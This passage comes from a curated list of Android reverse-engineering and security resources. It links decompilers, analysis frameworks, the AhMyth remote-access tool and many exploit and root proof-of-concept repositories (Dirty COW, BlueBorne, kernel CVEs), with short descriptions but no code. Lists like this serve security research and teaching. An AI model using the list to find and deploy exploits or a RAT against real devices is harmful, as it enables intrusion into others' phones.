usage](http://pentestcorner.com/androguard-plugin-for-sublime-text-installation-and-usage/) - 2014.09 [pediy] [[原创]静态开源工具Androguard 常用API手册](https://bbs.pediy.com/thread-192602.htm) - 2014.07 [Roland] [如何在Ubuntu 12.04上安装Androguard](https://blog.csdn.net/Roland_Sun/article/details/38083569) - 2013.05 [pediy] [[原创]windows下编译安装androguard](https://bbs.pediy.com/thread-172645.htm) - 2012.12 [n0where] [Android Application Analysis: Androguard](https://n0where.net/android-application-analysis-androguard) - 2012.05 [pediy] [[原创]Androguard软件安装方法](https://bbs.pediy.com/thread-151100.htm) - 2012.02 [toolswatch] [Androguard (Android Guard) v1.0 RC 1](http://www.toolswatch.org/2012/02/androguard-android-guard-v1-0-rc-1/) *** ## <a id="f136c28b41053e3d884385f33da22bb5"></a>jadx ### <a id="b36c7a8866ead5febf57b179811d6b35"></a>工具 - [**21172**星][1m] [Java] [skylot/jadx](https://github.com/skylot/jadx) dex 转 java 的反编译器 - [**89**星][2m] [C++] [romainthomas/pyjadx](https://github.com/romainthomas/pyjadx) Jadx Python Binding - [**9**星][1y] [PHP] [vaibhavpandeyvpz/deapk](https://github.com/vaibhavpandeyvpz/deapk) DeAPK is an open-source, online APK decompiler which lets you upload an APK and then decompile it to Smali or Java sources. It is built using Laravel, Vue.js, Bootstrap, FontAwesome, Pusher, Redis, MySQL, apktool, jadx and hosted atop DigitalOcean cloud platform. ### <a id="bbf5db01b18fc4ceacd7d1bb6e456807"></a>文章 - 2019.10 [secplicity] [Android APK Reverse Engineering: Using JADX](https://www.secplicity.org/2019/10/04/android-apk-reverse-engineering-using-jadx/) - 2015.01 [n0where] [Dex to Java Decompiler: jadx](https://n0where.net/dex-to-java-decompiler-jadx) - 2014.03 [androidcracking] [jadx - Dex to Java decompiler](http://androidcracking.blogspot.com/2014/03/jadx-dex-to-java-decompiler.html) *** ## <a id="51f8cd240758c6723fe59e5fb7b5a941"></a>jd-gui ### <a id="732953dd03c164baa82b5189a1e883bb"></a>工具 - [**7968**星][3m] [Java] [java-decompiler/jd-gui](https://github.com/java-decompiler/jd-gui) A standalone Java Decompiler GUI - [**109**星][2m] [Java] [java-decompiler/jd-core](https://github.com/java-decompiler/jd-core) JD-Core is a JAVA decompiler written in JAVA. ### <a id="b1b9fcec9b1935d4a5373e9907d5d1bb"></a>文章 - 2014.06 [willhackforsushi] [Code to Create a JD-GUI Error](http://www.willhackforsushi.com/?p=562) - 2014.02 [androidcracking] [zerdei's luyten, a worthwhile jd-gui alternative](http://androidcracking.blogspot.com/2014/02/zerdeis-luyten-worthwhile-jd-gui.html) - 2013.03 [pediy] [[原创]反编译工具dava的使用,个人觉得效果比jad/jd-gui效果好](https://bbs.pediy.com/thread-167198.htm) *** ## <a id="d9716319ad6dac60048651a18e2b0a4b"></a>dex2jar ### <a id="541b58e9a1ee2bebf1295ae116fafa4d"></a>工具 - [**7142**星][7m] [Java] [pxb1988/dex2jar](https://github.com/pxb1988/dex2jar) Tools to work with android .dex and java .class files - [**100**星][7m] [Java] [dexpatcher/dex2jar](https://github.com/dexpatcher/dex2jar) Unofficial dex2jar builds - [**85**星][1m] [Py] [tp7309/ttdedroid](https://github.com/tp7309/ttdedroid) 一键反编译工具One key for quickly decompile apk/aar/dex/jar, support by jadx/dex2jar/enjarify/cfr. - [**68**星][5y] [Py] [ajinabraham/xenotix-apk-reverser](https://github.com/ajinabraham/xenotix-apk-reverser) Xenotix APK Reverser is an OpenSource Android Application Package (APK) decompiler and disassembler powered by dex2jar, baksmali and jd-core. - [**60**星][7y] [Java] [strazzere/dehoser](https://github.com/strazzere/dehoser) Unpacker for the HoseDex2Jar APK Protection which packs the original file inside the dex header ### <a id="32f4773a7e0739def1ab014fadb3db88"></a>文章 - 2019.04 [X0x6d696368] [Ghidra: Android APK (it's basically dex2jar with a .dex decompiler)](https://www.youtube.com/watch?v=At_T6riSb9A) - 2013.01 [androidcracking] [string decryption with dex2jar](http://androidcracking.blogspot.com/2013/01/string-decryption-with-dex2jar.html) *** ## <a id="6d92b271b2e90e8b03d873712722adbe"></a>apktool ### <a id="2f014ba4bc98fef37272a1e4acc399f2"></a>工具 - [**9536**星][1m] [Java] [ibotpeaches/apktool](https://github.com/ibotpeaches/apktool) A tool for reverse engineering Android apk files - [**725**星][2m] [Java] [rover12421/shakaapktool](https://github.com/rover12421/shakaapktool) ShakaApktool - [**557**星][3y] [Java] [linchaolong/apktoolplus](https://github.com/linchaolong/apktoolplus) apk 逆向分析工具 - [**428**星][2y] [Py] [evilsocket/smali_emulator](https://github.com/evilsocket/smali_emulator) This software will emulate a smali source file generated by apktool. - [**331**星][7y] [Java] [brutall/brut.apktool](https://github.com/brutall/brut.apktool) A tool for reverse engineering Android apk files - [**100**星][1y] [winterssy/miui-purify](https://github.com/winterssy/miui-purify) 个人兴趣项目存档,使用 apktool 魔改 MIUI ROM,去除 MIUI 系统新增的广告。 - [**73**星][6m] [Ruby] [devunwired/apktools](https://github.com/devunwired/apktools) Ruby library for reading/parsing APK resource data - [**26**星][2m] [Visual Basic] [modify24x7/ultimate-advanced-apktool](https://github.com/modify24x7/ultimate-advanced-apktool) v4.1 - [**23**星][2m] [lexiie/termux-apktool](https://github.com/lexiie/termux-apktool) Decompile and Recompile android aplication use termux without openjdk installed - [**11**星][7m] [Dockerfile] [theanam/docker-apktool](https://github.com/theanam/docker-apktool) Docker image for Latest Apktool - [**6**星][1y] [Py] [h4ng3r/r2apktool](https://github.com/h4ng3r/r2apktool) radare2 based alternative to apktool - [**6**星][2y] [CSS] [oscar0812/apktoolfx](https://github.com/oscar0812/apktoolfx) A GUI for Apktool to make reverse engineering of android apps a breeze. - [**None**星][iBotPeaches/apktool](https://bitbucket.org/iBotPeaches/apktool/downloads/) ### <a id="8b6c1a37516d86d729d05ad769e5d681"></a>文章 - 2019.03 [connortumbleson] [Apktool v2.4.0 Released](https://connortumbleson.com/2019/03/03/apktool-v2-4-0-released/) - 2018.05 [pentesttoolz] [How to Reverse Engineer (Decompile/Recompile) Android Apk Files – Apktool and Kali Linux 2018.2](https://pentesttoolz.com/2018/05/19/how-to-reverse-engineer-decompile-recompile-android-apk-files-apktool-and-kali-linux-2018-2/) - 2018.04 [connortumbleson] [Apktool v2.3.3 Released](https://connortumbleson.com/2018/04/29/apktool-v2-3-3-released/) - 2018.04 [infosecinstitute] [Android Penetration Tools Walkthrough Series: Apktool](http://resources.infosecinstitute.com/android-penetration-tools-walkthrough-series-apktool/) - 2018.04 [connortumbleson] [Apktool v2.3.2 Released](https://connortumbleson.com/2018/04/07/apktool-v2-3-2-released/) - 2018.04 [pentesttoolz] [Apktool – A Tool For Reverse Engineering Android APK Files](https://pentesttoolz.com/2018/04/04/apktool-a-tool-for-reverse-engineering-android-apk-files/) - 2018.01 [pentesttoolz] [Apktool – Reverse Engineering Android apk Files](https://pentesttoolz.com/2018/01/09/apktool-reverse-engineering-android-apk-files/) - 2018.01 [n0where] [Reverse Engineering Android apk Files: Apktool](https://n0where.net/reverse-engineering-android-apk-files-apktool) - 2017.12 [connortumbleson] [Apktool v2.3.1 Released](https://connortumbleson.com/2017/12/26/apktool-v2-3-1-released/) - 2017.12 [tencent] [Android开发工具Apktool漏洞利用分析](https://security.tencent.com/index.php/blog/msg/122) - 2017.12 [360] [Apktool未正确解析XML导致的XXE漏洞分析](https://www.anquanke.com/post/id/89316/) - 2017.09 [connortumbleson] [Apktool v2.3.0 Released](https://connortumbleson.com/2017/09/21/apktool-v2-3-0-released/) - 2017.07 [connortumbleson] [Apktool v2.2.4 Released](https://connortumbleson.com/2017/07/29/apktool-v2-2-4-released/) - 2017.06 [connortumbleson] [Apktool v2.2.3 Released](https://connortumbleson.com/2017/06/13/apktool-v2-2-3-released/) - 2017.01 [connortumbleson] [Apktool v2.2.2 Released](https://connortumbleson.com/2017/01/23/apktool-v2-2-2-released/) - 2016.10 [connortumbleson] [Apktool v2.2.1 Released](https://connortumbleson.com/2016/10/18/apktool-v2-2-1-released/) - 2016.08 [connortumbleson] [Apktool v2.2.0 Released](https://connortumbleson.com/2016/08/07/apktool-v2-2-0-released/) - 2016.05 [onready] [Modification APK with apktool](https://onready.me/apk_modification_with_apktool.html) - 2016.05 [connortumbleson] [Apktool v2.1.1 Released](https://connortumbleson.com/2016/05/07/apktool-v2-1-1-released/) - 2016.03 [connortumbleson] [Apktool v2.1.0 Released](https://connortumbleson.com/2016/03/27/apktool-v2-1-0-released/) - 2015.12 [connortumbleson] [Apktool v2.0.3 Released](https://connortumbleson.com/2015/12/31/apktool-v2-0-3-released/) - 2015.10 [connortumbleson] [Apktool v2.0.2 Released](https://connortumbleson.com/2015/10/12/apktool-v2-0-2-released/) - 2015.07 [connortumbleson] [Apktool v2.0.1 Released](https://connortumbleson.com/2015/07/15/apktool-2-0-1-released/) - 2015.04 [connortumbleson] [Apktool v2.0.0 Released](https://connortumbleson.com/2015/04/20/apktool-v2-0-0-released/) - 2015.04 [connortumbleson] [Apktool: Fixing Bug 761](https://connortumbleson.com/2015/04/10/apktool-fixing-bug-761/) - 2015.02 [connortumbleson] [Apktool: Fixing Bug 713](https://connortumbleson.com/2015/02/16/fixing-apktool-bug713/) - 2015.02 [connortumbleson] [Apktool 2.0.0 RC4 Released](https://connortumbleson.com/2015/02/12/apktool-2-0-0-rc4-released/) - 2014.11 [connortumbleson] [Apktool 2.0.0 RC3 Released](https://connortumbleson.com/2014/11/26/apktool-rc3-released/) - 2014.10 [connortumbleson] [Apktool 2.0.0 RC2 Released](https://connortumbleson.com/2014/10/05/apktool-2-0-0-rc2-released/) - 2014.05 [Roland] [Android无源码调试APK(使用ApkTool和Eclipse ADT)](https://blog.csdn.net/Roland_Sun/article/details/26399669) - 2014.02 [connortumbleson] [Apktool 2.0.0 Beta 9 Released](https://connortumbleson.com/2014/02/06/apktool-2-0-0-beta-9-released/) - 2013.10 [connortumbleson] [Apktool 2.0.0 Beta 7 Released](https://connortumbleson.com/2013/10/13/apktool-2-0-0-beta-7-released/) - 2013.08 [pediy] [[原创]安卓加密壳(dexcrypt) , 防止apktool,dex2jar 等工具逆向你的apk,附上下载地址](https://bbs.pediy.com/thread-177590.htm) - 2013.05 [lhj0711010212] [apktool + smali + dex2jar + jdgui实现apk反编译](https://blog.csdn.net/lhj0711010212/article/details/8993711) - 2013.05 [pediy] [[原创]Apk修改利器:ApkToolkit v2.1](https://bbs.pediy.com/thread-171368.htm) - 2013.04 [pediy] [[原创]Apk修改利器:ApkToolkit v2.0](https://bbs.pediy.com/thread-169975.htm) - 2013.02 [pediy] [[原创]Apk修改利器:ApkToolkit v1.1](https://bbs.pediy.com/thread-163267.htm) - 2012.03 [pediy] [[原创]ApktoolGui v2.0 Final [3月18日添加运行环境检测功能,暂不支持Android 4.0]](https://bbs.pediy.com/thread-148006.htm) - 2011.07 [pediy] [[下载]ApkTool-GUI1.3.5内测版下载](https://bbs.pediy.com/thread-137114.htm) - 2010.10 [androidcracking] [unexplainable problems after recompilation with apktool](http://androidcracking.blogspot.com/2010/10/unexplainable-problems-after.html) *** ## <a id="63bfb9519c279be953eca5c8f99757fa"></a>virtualapk ### <a id="66019021f5ace5c41bf5de20be94f9e3"></a>工具 - [**7760**星][1y] [Java] [didi/virtualapk](https://github.com/didi/virtualapk) A powerful and lightweight plugin framework for Android *** ## <a id="40180b771f8762f1470aa38b19afc1e1"></a>baksmali ### <a id="c762fd140130e8f90c51d58f3e01288a"></a>工具 - [**4152**星][1m] [Java] [jesusfreke/smali](https://github.com/jesusfreke/smali) smali/baksmali - [**28**星][1y] [Smali] [strazzere/emacs-smali](https://github.com/strazzere/emacs-smali) Smali/Baksmali mode for Emacs ### <a id="f84bf9c4269ace64fe1a216046c67d62"></a>文章 - 2018.04 [infosecinstitute] [Android Penetration Tools Walkthrough Series Dex2Jar, JD-GUI, and Baksmali](http://resources.infosecinstitute.com/android-penetration-tools-walkthrough-series-dex2jar-jd-gui-baksmali/) - 2013.05 [lhj0711010212] [AXMLPrinter2 baksmali smali dex2jar 反编译文件用法](https://blog.csdn.net/lhj0711010212/article/details/8993722) - 2013.05 [lhj0711010212] [baksmali和smali工具的使用](https://blog.csdn.net/lhj0711010212/article/details/8993667) - 2013.05 [lhj0711010212] [Android 中编译,反编译,AXMLPrinter2,smali,baksmali](https://blog.csdn.net/lhj0711010212/article/details/8993581) *** ## <a id="3e5efcb723ddb311526b0cf27a095117"></a>cSploit ### <a id="61012694dfaf7dc87ef7a0738a005818"></a>工具 - [**2368**星][1y] [Java] [csploit/android](https://github.com/csploit/android) cSploit - The most complete and advanced IT security professional toolkit on Android. - [**60**星][7m] [HTML] [csploit/csploit.github.io](https://github.com/csploit/csploit.github.io) website for cSploit organization - [**34**星][2y] [Go] [csploit/daemon](https://github.com/csploit/daemon) the core of the cSploit project - [**24**星][4y] [C] [csploit/network-radar](https://github.com/csploit/network-radar) cSploit network radar ### <a id="47fbd63ae0e4321d98e09951fd37f1bb"></a>文章 - 2020.01 [BlackHat] [ACSploit: Exploit Algorithmic Complexity Vulnerabilities](https://www.youtube.com/watch?v=FAVD_awNeeA) - 2016.08 [TechnoHacker] [How to use cSploit (pentesting toolkit for Android!)](https://www.youtube.com/watch?v=UVhXshriZM8) - 2016.06 [hackingarticles] [Hack your Network through Android Phone using cSploit](http://www.hackingarticles.in/hack-network-android-phone-using-csploit/) - 2016.05 [cyberarms] [DNS Spoofing with Nethunter, cSploit & Kali Linux](https://cyberarms.wordpress.com/2016/05/28/dns-spoofing-with-nethunter-csploit-kali-linux/) *** ## <a id="6ad1dd69e315677a2252c1c8e8620572"></a>bytecodeviewer ### <a id="26f401339eb01096e69d6c650abe51df"></a>工具 - [**10890**星][4m] [Java] [konloch/bytecode-viewer](https://github.com/konloch/bytecode-viewer) A Java 8+ Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More) - [**1123**星][2m] [Kotlin] [ingokegel/jclasslib](https://github.com/ingokegel/jclasslib) jclasslib bytecode viewer is a tool that visualizes all aspects of compiled Java class files and the contained bytecode. *** ## <a id="1ed0d3c6279ba30df06262de9c24cdd8"></a>MobSF ### <a id="9c93b893f550d7c8cf4a19cce06e177b"></a>工具 - [**5441**星][1m] [Py] [mobsf/mobile-security-framework-mobsf](https://github.com/MobSF/Mobile-Security-Framework-MobSF) Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. - [**25**星][6m] [Shell] [soluto/mobsf-ci](https://github.com/soluto/mobsf-ci) All that is required to run MobSF in the ci - [**21**星][2m] [Java] [mobsf/mobsf-related-materials](https://github.com/mobsf/mobsf-related-materials) MobSF related Presentations, Slides and Others. ### <a id="9e5612f2c728bdbbca8b2571bd94cd79"></a>文章 - 2018.04 [infosecinstitute] [Android Penetration Tools Walkthrough Series: MobSF](http://resources.infosecinstitute.com/android-penetration-tools-walkthrough-series-mobsf/) - 2017.08 [freebuf] [MobSF:一款功能强大的智能移动安全框架](http://www.freebuf.com/articles/terminal/141439.html) - 2017.04 [n0where] [Mobile Security Framework: MobSF](https://n0where.net/mobile-security-framework-mobsf) - 2017.01 [toolswatch] [Mobile Security Framework (MobSF) v0.9.3](http://www.toolswatch.org/2017/01/mobile-security-framework-mobsf-v0-9-3/) - 2016.05 [toolswatch] [Mobile Security Framework (MobSF) v0.9.2](http://www.toolswatch.org/2016/05/mobile-security-framework-mobsf-v0-9-2/) - 2016.03 [freebuf] [工具推荐:MobSF,一款开源移动安全测试框架](http://www.freebuf.com/sectool/99475.html) *** ## <a id="eccb49e7c71be9df25fec6d241d18f8e"></a>androl4b ### <a id="800724f7b844e2293370510700c6ca73"></a>工具 - [**822**星][6m] [sh4hin/androl4b](https://github.com/sh4hin/androl4b) 用于评估Android应用程序,逆向工程和恶意软件分析的虚拟机 ### <a id="42ea2fc802be5efdd7bc656aa39446cb"></a>文章 - 2016.09 [n0where] [Android Security Virtual Machine: Androl4b](https://n0where.net/android-security-virtual-machine-androl4b) - 2016.08 [freebuf] [【经验】使用Androl4b进行安卓APP安全测试(Part 1)](http://www.freebuf.com/articles/terminal/110374.html) - 2016.07 [cn0xroot] [使用Androl4b进行安卓APP安全测试(Part 1)](https://cn0xroot.com/2016/07/29/how-to-testing-android-application-security/) - 2016.02 [freebuf] [工具推荐:Androl4b,安卓安全评估测试利器](http://www.freebuf.com/sectool/95243.html) *** ## <a id="78c2fbcadbbfda5a1448c6f150a9251d"></a>decaf ### <a id="0c3c1ab3d169db8cc058a0d72cb6aa1d"></a>工具 - [**535**星][1m] [C] [decaf-project/decaf](https://github.com/decaf-project/DECAF) a binary analysis platform based on QEMU. This is also the home of the DroidScope dynamic Android malware analysis platform. DroidScope is now an extension to DECAF. - [**26**星][3m] [Java] [decaf-lang/decaf](https://github.com/decaf-lang/decaf) The new Decaf compiler, rewritten in "modern" Java - [**22**星][3m] [Rust] [decaf-lang/decaf-rs](https://github.com/decaf-lang/decaf-rs) The Decaf compiler, written in Rust ### <a id="9843fb6cfb113c357deaf0dac05b22a8"></a>文章 - 2019.11 [freebuf] [DECAF:一款基于QEMU的二进制代码分析平台](https://www.freebuf.com/sectool/216773.html) - 2015.11 [securitygossip] [DECAF: Detecting and Characterizing Ad Fraud in Mobile Apps](http://securitygossip.com/blog/2015/11/18/2015-11-18/) - 2015.11 [sjtu] [DECAF: Detecting and Characterizing Ad Fraud in Mobile Apps](https://loccs.sjtu.edu.cn/gossip/blog/2015/11/18/2015-11-18/) - 2009.12 [sans] [Anti-forensics, COFEE vs. DECAF](https://isc.sans.edu/forums/diary/Antiforensics+COFEE+vs+DECAF/7741/) *** ## <a id="b32978986b1ad7ff33a1ff4ee968190c"></a>cuckoo-droid ### <a id="1532c5ea999fcd785571a78ca3fed8f6"></a>工具 - [**465**星][3y] [Py] [idanr1986/cuckoo-droid](https://github.com/idanr1986/cuckoo-droid) Automated Android Malware Analysis with Cuckoo Sandbox. # <a id="a054356d9fb3b22c638a5c49406e230a"></a>各类App *** ## <a id="51c70b0a90c17e4c3591c5997ffb1283"></a>ahmyth ### <a id="8192031d06c545c465a838c13002ef27"></a>工具 - [**1815**星][9m] [Smali] [ahmyth/ahmyth-android-rat](https://github.com/ahmyth/ahmyth-android-rat) Android Remote Administration Tool ### <a id="1d343a8e2abaf1bcdb2c7952fbab8ad1"></a>文章 - 2018.10 [cybrary] [“I smell a rat!” – AhMyth, not a Myth](https://www.cybrary.it/2018/10/ahmyth-not-myth/) - 2017.08 [n0where] [Android Remote Administration Tool: AhMyth](https://n0where.net/android-remote-administration-tool-ahmyth) - 2017.07 [pentestingexperts] [Hacking Android Smart Phone Using AhMyth Android RAT](http://www.pentestingexperts.com/hacking-android-smart-phone-using-ahmyth-android-rat/) *** ## <a id="1ab9ebcde9606f3e02a0dcd6c48411ad"></a>工具 - [**28657**星][1m] [Kotlin] [shadowsocks/shadowsocks-android](https://github.com/shadowsocks/shadowsocks-android) A shadowsocks client for Android - [**12463**星][1m] [Java] [signalapp/signal-android](https://github.com/signalapp/Signal-Android) A private messenger for Android. - [**12463**星][1m] [Java] [signalapp/signal-android](https://github.com/signalapp/Signal-Android) A private messenger for Android. - [**6106**星][3y] [shadowsocksrr/shadowsocksr-android](https://github.com/shadowsocksrr/shadowsocksr-android) A ShadowsocksR client for Android - [**3210**星][3y] [shadowsocksr-backup/shadowsocksr-android](https://github.com/shadowsocksr-backup/shadowsocksr-android) A ShadowsocksR client for Android - [**1007**星][7m] [Kotlin] [eycorsican/kitsunebi-android](https://github.com/eycorsican/kitsunebi-android) A fully-featured V2Ray client for Android. - [**600**星][4m] [Kotlin] [hmbsbige/shadowsocksr-android](https://github.com/hmbsbige/shadowsocksr-android) A ShadowsocksR client for Android, written in Kotlin. - [**536**星][2m] [Java] [dawei101/shadowsocks-android-java](https://github.com/dawei101/shadowsocks-android-java) Shadowsocks android client, pure java version # <a id="a3f24c3d0190fbd519cce450f423b86e"></a>Topic *** ## <a id="73b51525ab1548eba12f897ff482d785"></a>漏洞 ### <a id="d39d72e9362eda71cef10de260f43107"></a>工具 - [**2164**星][12m] [Py] [linkedin/qark](https://github.com/linkedin/qark) 查找Android App的漏洞, 支持源码或APK文件 - [**968**星][3y] [Java] [androidvts/android-vts](https://github.com/AndroidVTS/android-vts) Android Vulnerability Test Suite - In the spirit of open data collection, and with the help of the community, let's take a pulse on the state of Android security. NowSecure presents an on-device app to test for recent device vulnerabilities. - [**816**星][2y] [C] [timwr/cve-2016-5195](https://github.com/timwr/cve-2016-5195) CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android - [**737**星][4y] [Py] [androbugs/androbugs_framework](https://github.com/androbugs/androbugs_framework) AndroBugs Framework is an efficient Android vulnerability scanner that helps developers or hackers find potential security vulnerabilities in Android applications. No need to install on Windows. - [**607**星][1y] [C] [scottybauer/android_kernel_cve_pocs](https://github.com/scottybauer/android_kernel_cve_pocs) A list of my CVE's with POCs - [**528**星][3m] [C] [jiayy/android_vuln_poc-exp](https://github.com/jiayy/android_vuln_poc-exp) This project contains pocs and exploits for vulneribilities I found (mostly) - [**486**星][2y] [Py] [armissecurity/blueborne](https://github.com/armissecurity/blueborne) PoC scripts demonstrating the BlueBorne vulnerabilities - [**413**星][2y] [Py] [ojasookert/cve-2017-0785](https://github.com/ojasookert/cve-2017-0785) Blueborne CVE-2017-0785 Android information leak vulnerability - [**408**星][2y] [C] [fuzion24/androidkernelexploitationplayground](https://github.com/fuzion24/androidkernelexploitationplayground) a hands on guide to Linux kernel exploitation with a special interest in Android - [**389**星][2y] [Java] [davidbuchanan314/nxloader](https://github.com/davidbuchanan314/nxloader) My first Android app: Launch Fusée Gelée payloads from stock Android (CVE-2018-6242) - [**344**星][2y] [C++] [ele7enxxh/poc-exp](https://github.com/ele7enxxh/poc-exp) 某些 Android 漏洞的poc/exp - [**333**星][3y] [Java] [seven456/safewebview](https://github.com/seven456/safewebview) Android Safe WebView、解决WebView的Js对象注入漏洞、支持网页将JS函数(function)传到Java层,方便回调; - [**294**星][11m] [C] [tangsilian/android-vuln](https://github.com/tangsilian/android-vuln) 安卓内核提权漏洞分析 - [**260**星][1y] [C] [chef-koch/android-vulnerabilities-overview](https://github.com/chef-koch/android-vulnerabilities-overview) An small overview of known Android vulnerabilities - [**244**星][1m] [C] [grant-h/qu1ckr00t](https://github.com/grant-h/qu1ckr00t) A PoC application demonstrating the power of an Android kernel arbitrary R/W. - [**243**星][3y] [C] [hyln9/vikiroot](https://github.com/hyln9/vikiroot) CVE-2016-5195 (Dirty COW) PoC for Android 6.0.1 Marshmallow - [**240**星][1y] [Ruby] [hahwul/droid-hunter](https://github.com/hahwul/droid-hunter) (deprecated) Android application vulnerability analysis and Android pentest tool - [**167**星][1y] [C] [jioundai/bluedroid](https://github.com/jioundai/bluedroid) PoCs of Vulnerabilities on Bluedroid - [**167**星][2y] [JS] [logicalhacking/dvhma](https://github.com/logicalhacking/dvhma) Damn Vulnerable Hybrid Mobile App (DVHMA) is an hybrid mobile app (for Android) that intentionally contains vulnerabilities. - [**160**星][4y] [Py] [appknox/afe](https://github.com/appknox/AFE) Android Framework for Exploitation, is a framework for exploiting android based devices - [**142**星][5m] [HTML] [sundaysec/android-exploits](https://github.com/sundaysec/android-exploits) A collection of android Exploits and Hacks - [**141**星][5y] [Java] [retme7/cve-2014-7911_poc](https://github.com/retme7/cve-2014-7911_poc) Local root exploit for Nexus5 Android 4.4.4(KTU84P) - [**135**星][3y] [C] [jcadduono/android_external_dirtycow](https://github.com/jcadduono/android_external_dirtycow) CVE-2016-5195 (dirtycow/dirtyc0w) - recowvery fork - [**131**星][6y] [Java] [fuzion24/androidziparbitrage](https://github.com/fuzion24/androidziparbitrage) Exploit for Android Zip bugs: 8219321, 9695860, and 9950697 - [**129**星][2y] [C] [smeso/mtpwn](https://github.com/smeso/mtpwn) PoC exploit for arbitrary file read/write in locked Samsung Android device via MTP (SVE-2017-10086) - [**127**星][4y] [C] [fi01/cve-2015-3636](https://github.com/fi01/cve-2015-3636) PoC code for 32 bit Android OS - [**103**星][1y] [Java] [duo-labs/xray](https://github.com/duo-labs/xray) X-Ray allows you to scan your Android device for security vulnerabilities that put your device at risk. - [**97**星][2y] [C] [secwiki/android-kernel-exploits](https://github.com/secwiki/android-kernel-exploits) android kernel exploits漏洞集合 - [**95**星][1y] [Py] [integrity-sa/droidstatx](https://github.com/integrity-sa/droidstatx) Python tool that generates an Xmind map with all the information gathered and any evidence of possible vulnerabilities identified via static analysis. The map itself is an Android Application Pentesting Methodology component, which assists Pentesters to cover all important areas during an assessment. - [**89**星][5y] [C] [retme7/cve-2014-4322_poc](https://github.com/retme7/cve-2014-4322_poc) Gain privileges:system -> root,as a part of - [**84**星][10m] [C] [nowsecure/dirtycow](https://github.com/nowsecure/dirtycow) radare2 IO plugin for Linux and Android. Modifies files owned by other users via dirtycow Copy-On-Write cache vulnerability - [**81**星][3y] [C] [derrekr/android_security](https://github.com/derrekr/android_security) Public Android Vulnerability Information (CVE PoCs etc) - [**76**星][4y] [C] [viralsecuritygroup/knoxout](https://github.com/viralsecuritygroup/knoxout) A PoC of KNOXout (CVE-2016-6584) - bypassing Samsung KNOX protections and root Samsung Galaxy S6 Android Device. - [**70**星][4y] [C++] [laginimaineb/cve-2014-7920-7921](https://github.com/laginimaineb/cve-2014-7920-7921) Exploit code for CVE-2014-7920 and CVE-2014-7921 - code-exec in mediaserver up to Android 5.1 - [**69**星][2y] [Py] [odensc/janus](https://github.com/odensc/janus) Python script to create an Android APK exploiting the Janus vulnerability. - [**67**星][6y] [C++] [trevd/android_root](https://github.com/trevd/android_root) Got Root! - [**65**星][2y] [Py] [ojasookert/cve-2017-0781](https://github.com/ojasookert/cve-2017-0781) Blueborne CVE-2017-0781 Android heap overflow vulnerability - [**47**星][3y] [silvermoonsecurity/security-misc](https://github.com/silvermoonsecurity/security-misc) # Full overview of current vulnerability, exploit , fuzz, mitigation of current major Operation System(Windows, macOS, Linux, Android,iOS and so forath) and popular applicaiton - [**46**星][4m] [Java] [flankerhqd/vendor-android-cves](https://github.com/flankerhqd/vendor-android-cves) Collections of my POCs for android vendor CVEs - [**46**星][2m] [Java] [flankerhqd/vendor-android-cves](https://github.com/flankerhqd/vendor-android-cves) Collections of my POCs for android vendor CVEs - [**43**星][2y] [Shell] [xtiankisutsa/twiga](https://github.com/xtiankisutsa/twiga) 枚举 Android 设备,获取了解其内部部件和漏洞利用的信息 - [**39**星][3y] [Py] [programa-stic/marvin-dynamic-analyzer](https://github.com/programa-stic/marvin-dynamic-analyzer) Dynamic android vulnerability scanner using OpenNebula and Android-x86 emulators. - [**39**星][2y] [Py] [sundaysec/andspoilt](https://github.com/sundaysec/andspoilt) Run interactive android exploits in linux. - [**38**星][3m] [C] [arinerron/cve-2016-5195](https://github.com/arinerron/cve-2016-5195) Automated Android root via CVE-2016-5195 (dirtycow/dirtyc0w PoC) - [**37**星][2y] [Java] [htbridge/pivaa](https://github.com/htbridge/pivaa) Created by High-Tech Bridge, the Purposefully Insecure and Vulnerable Android Application (PIVAA) replaces outdated DIVA for benchmark of mobile vulnerability scanners. - [**36**星][7m] [Py] [raymanfx/android-cve-checker](https://github.com/raymanfx/android-cve-checker) Python tool to check your Android kernel for missing CVE patches. - [**33**星][6m] [Py] [monolithworks/trueseeing](https://github.com/monolithworks/trueseeing) Non-decompiling Android vulnerability scanner (DC25 demo lab, CB17) - [**32**星][5y] [Ruby] [jduck/addjsif](https://github.com/jduck/addjsif) Metasploit Exploit Module for the Android addJavascriptInterface Issue (MITM) - [**26**星][4m] [Py] [alfa100001/-cve-2017-0785-blueborne-poc](https://github.com/alfa100001/-cve-2017-0785-blueborne-poc) CVE-2017-0785 BlueBorne PoC - [**25**星][1m] [b3nac/injuredandroid](https://github.com/b3nac/injuredandroid) A vulnerable Android application that shows simple examples of vulnerabilities in a ctf style. - [**24**星][3y] [C] [davidbuchanan314/cowroot](https://github.com/davidbuchanan314/cowroot) Universal Android root tool based on CVE-2016-5195. Watch this space. - [**22**星][3y] [C] [sagi/android_pocs](https://github.com/sagi/android_pocs) Android Vulnerability Reports and POCs. - [**19**星][1m] [Java] [ivan-markovic/android-task-injection](https://github.com/ivan-markovic/android-task-injection) Task Hijacking in Android (somebody call it also StrandHogg vulnerability) - [**18**星][3y] [C] [freddierice/farm-root](https://github.com/freddierice/farm-root) Farm root is a root for android devices using the dirty cow vulnerability - [**18**星][1y] [C++] [tamirzb/cve-2018-9539](https://github.com/tamirzb/cve-2018-9539) PoC code for CVE-2018-9539 - [**15**星][7y] [C] [hiikezoe/libperf_event_exploit](https://github.com/hiikezoe/libperf_event_exploit) CVE-2013-2094 exploit for android - [**15**星][3y] [Java] [tanprathan/sievepwn](https://github.com/tanprathan/sievepwn) An android application which exploits sieve through android components. - [**13**星][3y] [C] [a7vinx/cve-2015-3636](https://github.com/a7vinx/cve-2015-3636) Expolit for android (goldfish kernel v3.10.0+) on arm64 with PXN&SELinux Bypassed. Based on fi01's code. - [**13**星][5y] [Perl] [irsl/lgosp-poc](https://github.com/irsl/lgosp-poc) LG On Screen Phone authentication bypass PoC (CVE-2014-8757) - [**13**星][6y] [Shell] [k3170makan/droidsploit](https://github.com/k3170makan/droidsploit) A collection of scripts to find common application vulnerabilities in Android Applications - [**11**星][4y] [Java] [geneblue/cve-2014-7911-exp](https://github.com/geneblue/cve-2014-7911-exp) exploit for cve-2014-7911; android; java deserialization ;system privilege;ace; - [**11**星][2m] [Java] [ioactive/aosp-downloadproviderhijacker](https://github.com/ioactive/aosp-downloadproviderhijacker) PoC Exploiting Permission Bypass in Android's Download Provider (CVE-2018-9468) - [**10**星][3y] [C] 